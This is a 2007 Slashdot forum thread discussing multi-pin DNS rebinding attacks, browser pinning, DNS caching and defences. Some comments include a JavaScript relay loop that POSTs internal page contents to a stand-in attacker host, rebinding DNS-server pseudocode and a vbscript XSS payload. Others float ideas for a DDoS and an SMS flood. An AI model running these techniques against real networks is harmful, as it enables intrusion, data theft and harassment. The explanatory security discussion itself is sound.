Security

DNS Rebinding Attacks, Multi-Pin Variant

Morty writes "DNS rebinding attacks can be used by hostile websites to get browsers to attack machines behind firewalls, or to attack third parties. Browsers use "pinning" to prevent this, but a paper describes so-called multi-pin vulnerabilities that bypass the existing protections. Note that, from a DNS perspective, this is a "feature" rather than an implementation bug, although it's possible that DNS servers could be modified to prevent external sources from being able to point at internal resources."
  • Fox? (Score:1, Flamebait)

    by StarvingSE ( 875139 )
    Is this a new FOX special?
  • by bugnuts ( 94678 ) on Monday August 06, 2007 @06:28PM (#20136201) Journal

    We are now checking your browser for DNS rebinding vulnerabilities.
    Not without Javascript you aren't!

    But it's true, most people loooove that javascript. I can't stand it, myself, and only enable it when I absolutely have to.
    • Does anyone know of a way to pause/restart someone else's running Javascript (in Firefox or Safari) without reloading the page? I mostly browse with JS off, but occasionally turn it on for one site or another. I'd like to be able to stop/pause JS after it starts (e.g., to pause a CPU-sucking JS animation loop, or to halt JS on a site where I unintentionally left it on).

      Any ideas? Thanks.
      • Re: (Score:1, Informative)

        by Anonymous Coward
        • And how do you pause a running script without knowing where to set a breakpoint - or for that matter how do you pause a timer (setInterval) at all?
      • by captnitro ( 160231 ) * on Monday August 06, 2007 @07:17PM (#20136631)

        CPU-sucking JS animation loop... Any ideas?


        You should probably consider upgrading from a 486.
        • Re: (Score:3, Insightful)

          by Sigma 7 ( 266129 )

          You should probably consider upgrading from a 486.

          Won't protect against the buggy Javascript in question.

          As an example, let's assume that one of those shaky "You're the 999,999th visitor" ads pins the CPU at 100%. Unless you have only one web browser window/tab open (if you read /., probably not), it will be running more than once and thus cause problems. Even one 100% CPU process or thread can lock down the system - especially if it's called "Spoolsv.exe".

          Dual core systems could help... but it won't be long before an SMP process can do the 100% pinning as well.

          • by Kwiik ( 655591 )
            we repeat:
            You should probably consider upgrading from a 486.
            • by Sigma 7 ( 266129 )

              we repeat:
              You should probably consider upgrading from a 486.
              The processors capable of handling an infinite number of operations in finite time haven't been invented yet. But once that happens, we'll be able to have infinite-precision calculators.
              • by Kwiik ( 655591 )
                The point is that a faster processor, regardless of whether it's multi-core, gives the OS a much better opportunity to arrange multitasking with other processes of the same priority.

                I really hope nobody is scheduling javascript applications above the default priority.

                OTOH, couldn't a plausible fix for this be to have web browsers run all scripted functions in a lower-priority thread?
      • Re: (Score:3, Interesting)

        by cheater512 ( 783349 )
        Firefox should kill any bad javascript automatically.
        If a script hogs the CPU, Firefox should wait for a period of time and then ask you what to do with it.
    • Re: (Score:1, Informative)

      by Anonymous Coward
      Not without Javascript you aren't!

      The article mentions Java and Flash are problems as well.
    • by grcumb ( 781340 ) on Monday August 06, 2007 @07:10PM (#20136573) Homepage Journal

      We are now checking your browser for DNS rebinding vulnerabilities.
      Not without Javascript you aren't!

      Heh, my boy, you just summed up the Web's great affliction in a nutshell.

      This particular exploit vector is especially troublesome because turning off the ability to point a name at multiple IPs would break a large part of the Internet. But it wouldn't be an issue for web browsers if we didn't see the need for the Web to be dynamic and interactive. Dynamism and interactivity are really not built into HTTP. It would be more accurate to say that HTTP was designed to be just the opposite.

      Website designers and software makers have been trying to turn the Web into a collection of desktop applications since about the time the Web was invented. This runs counter to what Tim Berners-Lee intended. HTTP is stateless for a reason. I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

      Unfortunately, this particular horse bolted from the barn in the earliest days of the web, and there's no easy way to get it back in. A wise web developer will nonetheless read and understand the HTTP protocol. Its statelessness and agnosticism can be strengths when considered in the proper light....

      ...Yeesh, that last sentence makes me feel like Yoda counselling young Luke.... 8^/

      • Re: (Score:3, Interesting)

        by grcumb ( 781340 )

        Heh, I picked a fine day to start pontificating about what the web is for [google.com]....

        Happy birthday, Web. You're almost street legal now.... 8^)

      • by fm6 ( 162816 )

        I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

        You make some good points. But I don't think it's productive to imagine what Sir Tim had in mind when he invented HTTP. Like many Internet pr…

        • the original 3 HTTP methods were GET, PUT, and DELETE. POST/CGI came later. PUT and DELETE are used today in WebDAV, but not as originally intended (think wiki).
        • by grcumb ( 781340 )

          You make some good points. But I don't think it's productive to imagine what Sir Tim had in mind when he invented HTTP.

          Not necessarily productive in any immediate sense, but educative. It helps us understand the current shortcomings of HTTP, and why it's been hacked into the shape it has these days. I really worry about the naive approaches some so-called Web 2.0 applications take, and wanted to reiterate that those who don't learn from history are condemned to repeat it.

          If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one.

          Agreed. That's more or less what I was implying, though not nearly as clearly and succinctly. 8^)

          Learning what HTTP…

        • by Jeruvy ( 1045694 ) *

          I'm not buying any of this. Sure, some SMTP servers were open, but not the smart ones. Granted, the smart ones were pretty rare. As for dynamic content, it was taken into account, but "on-the-fly" and "user-generated" dynamic content were not considered. A browser would allow one to browse, not alter or change. But it was simple enough to take the content, alter it, and repost it, even linking to the original. However, IP and ownership of the "content" got in the way. We quic…

          • by fm6 ( 162816 )

            Sure, some SMTP servers were open, but not the smart ones.
            Dude, when I started using the internet in 1994, I was able to telnet into any SMTP server. Richard Stevens even used this fact in his book on TCP/IP, to demonstrate how SMTP worked.
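            For anyone who never saw it done, a hand-typed session went roughly like this (an illustrative transcript, not the one from Stevens' book; the hostnames are placeholders and the exact responses vary by server):

              $ telnet mail.example.net 25
              220 mail.example.net ESMTP
              HELO client.example.org
              250 mail.example.net
              MAIL FROM:<alice@example.org>
              250 OK
              RCPT TO:<bob@example.net>
              250 OK
              DATA
              354 End data with <CR><LF>.<CR><LF>
              Subject: hello

              Hi Bob.
              .
              250 OK: queued
              QUIT
              221 Bye

            An "open relay" was simply a server that would accept that MAIL FROM/RCPT TO pair even when neither address was its business to handle.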
            • by Jeruvy ( 1045694 ) *
              Dude, the Morris worm worked by exploiting SMTP; what's your point? The "smart" ones fixed the problem. It took the rest of the planet 10 years. Typical.
              • by fm6 ( 162816 )
                My point being that there was a time when people didn't feel a need to secure their SMTP servers.
                • by Jeruvy ( 1045694 ) *
                  Your point is lost now. Even today, people don't feel the need to secure their (insert term) servers; we call those machines zombies.
                  • by fm6 ( 162816 )
                    Jeez, you're dense. I said that some Internet conventions date back to a period when people didn't worry about security; as an example, I mentioned that people didn't even secure their SMTP servers. You said "smart people always secured their servers." Which isn't true.

                    If you can't follow that argument, I'm certainly not going to try to parse it for you.
      • by DrSkwid ( 118965 )
        > This runs counter to what Tim Berners-Lee intended

        He never thought of the Host: header either; perhaps we should go back to one IP per domain.
      • by sootman ( 158191 )
        I can't resist: "Read the Source, Luke!"

        Mods: don't waste points on this. :-)
      • This doesn't require round-robin DNS to work. The main proof of concept linked from that page actually just creates a new A entry for unixtimestamp() . some_3_digit_value . domain.tld.

        This entry points to the attacking webserver, and is given a very low TTL. Once DNS pinning is circumvented, the entry is changed. It doesn't have to have more than one A record.
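        In pseudo-Javascript, the server side of that trick amounts to something like this. This is only a sketch of the logic described above, not the paper's code: onQuery and reply are hypothetical stand-ins for whatever DNS-server framework is used, and the addresses come from the documentation/private ranges.

          // First answer for a fresh hostname points at the attacker's web
          // server with a very low TTL; any later lookup of the same name
          // is rebound to the internal target.
          var ATTACKER_IP = "203.0.113.7"; // public-facing web server
          var TARGET_IP = "192.168.0.1";   // host behind the victim's firewall
          var seen = {};                   // hostnames answered once already

          onQuery(function (query) {       // hypothetical framework hook
            if (!seen[query.name]) {
              seen[query.name] = true;
              reply(query, ATTACKER_IP, 1); // TTL of 1 second
            } else {
              reply(query, TARGET_IP, 1);   // the "rebind"
            }
          });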
    • by wytcld ( 179112 )
      Um ... at the author's site:

      We have detected that your browser is vulnerable to efficient DNS rebinding attacks.
      Since I'm running Noscript, either the author of the paper is a liar (or his "test" is phoney), or else you're wrong when you say

      Not without Javascript you aren't!
      Guess I'll have to read the PDF.
  • Flashback (Score:5, Insightful)

    by Spazmania ( 174582 ) on Monday August 06, 2007 @07:33PM (#20136747) Homepage
    If you haven't read the article, I'll summarize it for you: it's another critical vulnerability in Java/Javascript. The sandboxed script in the web browser alternately makes GET and POST requests to the "same" server, with each POST containing the contents of the prior GET... Only the IP address associated with the server's hostname keeps alternating between a server inside your firewall and the attacker's real server outside it. Oops.
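    In rough code, that loop looks something like this (a sketch only; attacker.example is a placeholder hostname, and the rebinding happens in DNS, not in the script):

      // Same-origin policy is satisfied because both requests go to one
      // hostname; DNS rebinding flips which IP that hostname reaches.
      function relayLoop() {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://attacker.example/page", true);
        xhr.onreadystatechange = function () {
          if (xhr.readyState !== 4) return;
          var out = new XMLHttpRequest();
          out.open("POST", "http://attacker.example/drop", true);
          out.send(xhr.responseText);  // POST carries what the GET just read
          setTimeout(relayLoop, 2000); // and around we go again
        };
        xhr.send(null);
      }
      relayLoop();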

    At times like these, I tell a story about 1988 when I wrote a BBS terminal emulator for the Commodore 64 which cleverly allowed the BBS to send and run new code on the caller's machine. Another gentleman who didn't much like me noticed the feature and arranged for a number of BBS systems to execute the code at location 64738: system reset.

    There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?
    • by Lux ( 49200 )
      > There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

      I'm not as much a pessimist as you are on this. The fact that so much of attackers' energy goes into circumventing the same-origin policy…
    • Re: (Score:3, Informative)

      by statusbar ( 314703 )

      One point made in the paper:

      Current versions of the JVM are not vulnerable to this attack because the Java security policy has been changed. Applets are now restricted to connecting to the IP address from which they were loaded.

      If the web browser and applet are connecting to the server via a proxy, then neither the web browser nor the applet has control over "connecting to the same IP address from which they were loaded."

      Therefore, if a proxy is involved, current versions of the JVM are still vulnerable.

  • Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?
  • What is "pinning," you may ask? From the linked PDF, it's the caching of DNS lookups:

    A common defense [for DNS rebinding attacks] implemented in several browsers is DNS pinning: once the browser resolves a host name to an IP address, the browser caches the result for a fixed duration, regardless of TTL.

    But apparently this can be subverted with browser plug-ins, which have a separate "pin database".
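    In other words, a pin table is nothing fancier than this sketch (all of the names here are invented for illustration):

      var PIN_SECONDS = 15 * 60;  // fixed duration, regardless of DNS TTL
      var pins = {};              // hostname -> { ip: ..., expires: ... }

      function resolvePinned(host) {
        var now = new Date().getTime() / 1000;
        if (pins[host] && pins[host].expires > now) {
          return pins[host].ip;   // ignore fresh DNS; reuse the pinned IP
        }
        var ip = dnsLookup(host); // hypothetical resolver call
        pins[host] = { ip: ip, expires: now + PIN_SECONDS };
        return ip;
      }

    The multi-pin problem is that the browser, the Java VM, and the Flash player each keep their own copy of that table, so one hostname can end up pinned to two different IPs at once, with the plugins acting as a bridge between the two.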

    • it's the caching of DNS lookups

      Specifically, it's caching of DNS lookups IN VIOLATION OF the DNS protocol's standard for TTL. This causes all manner of havoc when you change ISPs and need the old name/address mappings to expire quickly. I've seen Windows boxen continue to poll the old IP address for a web site weeks after a record with a 5-minute TTL was changed to the new IP address.

      Pinning is bad bad bad, and any application so poorly designed that it needs pinning to work securely is worse. If Javascript c…
  • by mcrbids ( 148650 ) on Monday August 06, 2007 @08:00PM (#20136945) Journal
    Did you read the abstract?

    It's well written, and has lots of examples of exactly how this vulnerability can be exploited. In short, I could probably sit down and, in a single afternoon, write a set of scripts for a webserver and DNS server, post it on a $30/month "virtual host" server, take out an ad for $100, and end up with a powerful DDoS attack on my host of choice.

    All done in less than 24 hours.

    Screw the "cyber-terrorists" in Russia: this is REALLY BIG, and is one of many REALLY BIG problems that can be exploited! And the fact that we're all here, reading and posting, demonstrates that the many vulnerabilities of the Internet are NOT being exploited to anything like their real potential...

    So think about it: while we here at Slashdork might know as many as a dozen exploitable vulnerabilities like this one that would be nearly impossible to close, how many of us have actually DONE any of these?

    And that, folks, is why security will NEVER be 100% technical; there will always be a social mechanism involved. There really is an amazing amount of security in simply knowing that if you do such things, really bad stuff could happen to you.

    Not will happen, not even likely to happen. Just could happen is enough.

    Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

    As a case in point, I was chatting with my flight instructor and a staff member at the local FBO (the fixed-base operator, the outfit that services small planes at an airport), and the staff member mentioned something about an annoying ex-boyfriend who kept calling her.

    Without thinking, I mentioned the possibility of writing a quick script to send him 100,000 text messages that would say "Leave me the freak alone!". I imagined a two-line script that would take all of about 10 seconds to write, and I could use the hotspot at the FBO to do it.

    100,000 isn't even a particularly big number for me - I routinely deal with datasets in the millions of records - so it didn't really occur to me right away what a blow that would be. But 100,000 times 5 cents adds up to $5,000 worth of text messages! And I'm sure that his cell company would limit the number of messages to be sent, but it's pretty certain that quite a few WOULD get through.

    It was surprising to me what a staggering blow this would be. I was actually a bit embarrassed at having mentioned it.

    Don't underestimate the power of social mechanisms to ensure our security!
    • by flonker ( 526111 )
      The really scary thing is repinning to a local IP address and then using the socket-based vulnerabilities to reach port 135, allowing the attacker to bypass software (and hardware) firewalls and fully compromise the victim. All for the cost of a single ad impression!
    • Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

      I don't have a day job, but still can't be bothered wreaking havoc…

    • Yeah, when I was in college 10 years ago, I discovered several ways of effectively shutting down the internet. The possibility of punishment wasn't there (our lab computers didn't require people to log in, so there was no audit trail), but I still didn't do it, since I am of the opinion that practical jokes should always be in good humor.
    • Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely impractical? In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain. Beyond that, some knowledge of the internal network is required so the attacker knows where to go. Does the javascript exploit change the user's DNS server to something malicious?

      In the event that everything lines up…
      • by Morty ( 32057 )

        Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely impractical? In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain.

        RTFA. The attacker doesn't manipulate the user's DNS; the attacker manipulates his/her own DNS. The attacker uses records with low or 0 TTLs, so the user's DNS doesn't cache them, as per spec. The trick is that the att…

  • by linuxkrn ( 635044 ) <(moc.nigolxunil) (ta) (nostawg)> on Monday August 06, 2007 @08:09PM (#20137007)
    I did RTFA, and it seems to me they made an oversight in the fact that most ISP/corporate sites use a caching DNS server. A repeated lookup of the same domain will return the cached result. Their POC depends on the client doing another lookup and getting a different result, so the attack would depend on the client being able to reach the attacker's DNS.

    Now, they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest, has a bad habit of ignoring the TTL in my zone files.

    Example 1:

    target lookup (T0) -> www.attacker.com
    www.attacker.com -> 192.168.0.1

    target lookup (T1) -> www.attacker.com
    ISP/site cached reply -> 192.168.0.1 (attack failed)

    Example 2:
    target lookup (T0) -> www.attacker.com
    www.attacker.com -> 192.168.0.1

    target lookup (T1) -> www2.attacker.com
    attacker's ISP cached reply -> 192.168.0.1 (attack failed again)

    The only case I can see this working is if the zone records contain an IP for some third-party source that they want to try to abuse. So say www2.attacker.com points to 10.0.0.1 and that number is static in their zone record. That appears to be a much less efficient version of a zombie scan with IP spoofing.

    And finally, this is all dependent on the attacker tricking the client into loading Flash/Java/Javascript from their box. Another win for NoScript.
    • by evought ( 709897 )

      [snip]
      Now, they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest, has a bad habit of ignoring the TTL in my zone files.
      [snip]

      Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.

      • by Morty ( 32057 )
        Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.
        The article explicitly says that the attack assumes low or 0 TTLs. Your OS cache should not be caching 0 TTLs per RFC1034. Normally, you need to flush the cache because you are editing a record with a high(er) TTL, so your local cache legitimately retains the old version of the record. Some cac…
        • Re: (Score:3, Informative)

          by afidel ( 530433 )
          Your OS cache should not be caching 0 TTLs per RFC1034

          Meanwhile, back in the real world, both OS X and Windows DO ignore 0 TTLs, as do many ISPs' caching DNS servers. This is one of the things that makes round-robin DNS and ISP cutovers rather hard to plan in the real world. In fact, I assume some worst-case ISPs will cache results for 48-72 hours despite a TTL of, say, 10 minutes.
    • by Morty ( 32057 )
      Now, they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached.

      DNS servers cache based on the resource record's TTL, not based on the serial in the zone's SOA. The serial is used by secondaries.

      And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest…
    • Re: (Score:2, Informative)

      by BitZtream ( 692029 )
      The zone serial number has nothing to do with this. DNS cache entries, be they on the host, in caching DNS servers, or in the client's primary DNS server, are controlled by the TTL (time to live) setting. If you set the TTL to 0, you effectively disable caching across the internet for your domain. You may find some caching servers that won't honor a 0, but they're sure to expire the cache entry pretty quickly, and they are few and far between.
      • Re: (Score:2, Informative)

        by ACMENEWSLLC ( 940904 )
        It seems that it is a given that the host name must stay the same for this to work, and that the TTL must be very low, per TFA.

        So if I modify my DNS cache server to ignore low TTLs and force a minimum TTL of 60 minutes, then I've defeated this issue. Of course, I've also broken external sites' ability to do quick failovers. But that can wait until a browser fix is out.

        A browser fix could defeat this by maintaining DNS entries for a period of time. If the DNS changes to RFC1918 from non-RFC1918, then prompt th…
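        That check would be cheap. A sketch of the RFC1918 test (the function names are invented for illustration):

          // True for 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16
          function isRfc1918(ip) {
            var o = ip.split(".").map(Number);
            return o[0] === 10 ||
                   (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
                   (o[0] === 192 && o[1] === 168);
          }

          // The suspicious case: a hostname whose address flips from
          // public space into private space between lookups
          function looksLikeRebind(oldIp, newIp) {
            return !isRfc1918(oldIp) && isRfc1918(newIp);
          }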
    • by DrSkwid ( 118965 )
      1) run your own nameserver
      2) use a new subdomain for every request
      3) ???
      4) profit
    • by flonker ( 526111 )
      A host can have multiple A records, so you don't need to take advantage of a 0 TTL; you can just use the multiple A records to have the browser choose a random IP. You'll get a 50% success rate, but that's still pretty good.
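      In zone-file terms, that variant is just the following (placeholder domain; one documentation-range address and one private one):

        ; two A records for one name: the browser may pick either
        www.attacker.example. 0 IN A 203.0.113.7 ; attacker's real server
        www.attacker.example. 0 IN A 192.168.0.1 ; victim's internal host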
  • Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP? Servers that will let me point at them, that are fast and reliable.
    • Here's one that will* work for everyone: 127.0.0.1

      *After you set up your own DNS server on the same computer.
    • Re: (Score:3, Informative)

      by theGreater ( 596196 )
      OpenDNS ( http://www.opendns.com/ [opendns.com] ) works pretty well. I typically go internal cache, external ISP, OpenDNS on my systems. Keeps Windows boxes in line, especially.

      -theGreater.
    • by Electrum ( 94638 )
      Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP?

      OpenDNS [opendns.com]
      • OpenDNS uses wildcarding, which was despised when Network Solutions tried it. Granted, if all web servers had proper pointers it wouldn't be an issue, since www.slashdot.org would be the same as slashdot.org. OpenDNS also breaks the "I'm Feeling Lucky" lookup feature built into Firefox by removing Google from the loop. I tried it; I didn't like it. OpenDNS doesn't play well with my browsing habits. If I type domain.com instead of www.domain.com, Firefox will attempt to look up www.domain.com if domain.com doesn't hav…
    • 4.2.2.1-4.2.2.6. Anycasted for speedy access.
  • There are plenty of other exploits that allow far greater control over all the IE users on the Internet than this one. It still relies on the user going to a malicious website in the first place. If you can draw users to that website, you might as well just fully exploit their browser and get some real code on the machine, then use that rather than bouncing crap around with javascript and constantly changing DNS entries.

    And considering that I've already (after reading the article mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, it's even less useful.
    • Re: (Score:3, Informative)

      by Morty ( 32057 )

      It still relies on the user going to a malicious website in the first place.

      If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.

      And considering that I've already (after reading the article mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, it's even less useful.

      Cool! What…

      • If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.
        That's yet another reason to block known advertisers, with AdBlock personally, or company-wide with stuff like dnscruft.
      • Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.
        • by Morty ( 32057 )

          Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

          That's not the problem. The problem is requests from internal addresses for external names that resolve to internal addresses. How do you block *that*?
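          For what it's worth, resolvers have since grown a knob for exactly this: refusing upstream answers that land in private address space. In dnsmasq, for example, the anti-rebinding options look like this (the allowlisted domain below is a placeholder):

            # drop upstream answers that resolve into RFC1918 space
            stop-dns-rebind
            # but allow 127.x answers (some blocklists return them on purpose)
            rebind-localhost-ok
            # and allow this internal domain to resolve to private addresses
            rebind-domain-ok=/intranet.example/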
    • by DrSkwid ( 118965 )
      Not if you use an XSS vulnerability. I already know one popular site I could use.
      HINT: XSS filters sometimes check only for the javascript: version.

      I think HTTPS would sort out most of this problem. Cheap certs really are a must!
      • by DrSkwid ( 118965 )
        Bah, slashcode ate my comment. I'll do it in BBCode, seeing as that's usually the place to exploit it:

        [img]vbscript:msgbox("xss js 0wns j00")[/img]

        Use the vbscript of your choice; I'd pop an XMLHttpRequest out, eval the returned javascript, and off you go.
  • ... so that we can redirect links to the paper explaining all to a server that isn't slashdotted...
  • Multi-Pass!

    (Sorry, it was the first thing that came to mind.)
